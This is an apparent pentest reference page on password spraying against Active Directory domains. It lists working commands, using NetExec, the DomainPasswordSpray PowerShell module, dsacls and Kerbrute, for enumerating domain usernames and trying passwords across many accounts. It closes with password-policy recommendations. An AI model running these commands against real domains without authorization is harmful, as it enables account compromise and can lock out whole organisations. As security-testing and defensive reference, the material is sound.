Password Spraying

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

This exploit can lock a large amount of - or even all - domain accounts. Be careful to not perform to much attemps on the same usernames or ensure to know the enforced password policy first.


For this attack, vulnerability isn’t technical. It is simply humans too lazy to put strong and unique passwords.

Password spraying consist in trying a very few passwords for a large amount of potential usernames. It is kind of the opposite of Active Directory brute-force attack, where you attempt many passwords.


  • Network access.
  • Information about your target.


To perform password spraying on a domain, target a domain controller or a domain joined computer if you can’t access a domain controller. If you already have an initial footprint on the domain, just run one of the following commands to get usernames.

# With NetExec (
nxc smb $dc_ip -d $domain -u $username -p $password --users

# From a domain joined Windows computer.
net user /domain

# From a domain joined computer with DomainPasswordSpray PowerShell module (
Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

Otherwise, you can use OSINT tools like linkedin2username to generate username lists.

Usernames often have the same nomenclature like f.lastname or firstname.lastname. Nevertherless, you should first ensure the correct terminology before starting password spraying.

# Try the same password for every username.
nxc smb $target -d $domain -u usernames.txt -p $password

# Try multiple passwords for every username.
nxc smb $target -d $domain -u usernames.txt -p passwords.txt

# Try line by line (username1 with password1, username2 with password2, etc.).
nxc smb $target -d $domain -u usernames.txt -p passwords.txt --no-bruteforce

# From a domain joined computer with DomainPasswordSpray PowerShell module.
Invoke-DomainPasswordSpray -Password $password

# From a domain joined computer using dsacls.exe built-in binary.
dsacls.exe "$distinguishedname" /user:$username@$domain /passwd:$password

# From a domain joined computer using Kerbrute (
./Kerbrute.exe passwordspray -d $domain usernames.txt $password


  • Use strong passwords that are not easily sprayable.
  • Enfore strict password policies with account lockout threshold.
  • Do not reuse passwords from a system to another.